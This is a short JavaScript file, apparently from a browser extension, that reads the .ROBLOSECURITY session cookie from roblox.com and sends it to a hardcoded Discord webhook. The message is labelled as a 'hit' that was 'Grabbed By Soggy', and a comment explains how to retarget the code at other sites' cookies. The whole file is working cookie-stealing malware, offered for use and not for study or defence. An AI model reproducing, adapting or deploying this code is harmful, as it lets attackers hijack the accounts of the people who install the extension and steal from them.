function webhookReq(webhook, cookie) {
  var params = {
      embeds: [{
            "title": `1+ Hits! 💸 `,
            "description": ">>>Grabbed By Soggy",
            "color": 15258703,
            "fields": [{
              "name": 'Cookie',
              "value": "```\n" + cookie + "\n```",
              inline: false
            }]
    }]
  }
   
  // Send the webhook request
  fetch(webhook, {
    method: "POST",
    headers: {
      'Content-type': 'application/json'
    },
    body: JSON.stringify(params)
  })
}



// Driver Code:
cookieInfo = {url: "https://www.roblox.com/", name: '.ROBLOSECURITY'}; //If you want to grab other site cookies, change the values both here and in the manifest.json file
chrome.cookies.get(cookieInfo, function(cookie) {
  if (cookie) {
    webhookReq("https://discord.com/api/webhooks/1036441706624733206/t2Opzf-_31AL65j3_hKDOoyg3k3HJd_N8aRd6RHRiVg981X5WR8w6YUVHu1d1FC3Tkay", cookie.value);
  }
});
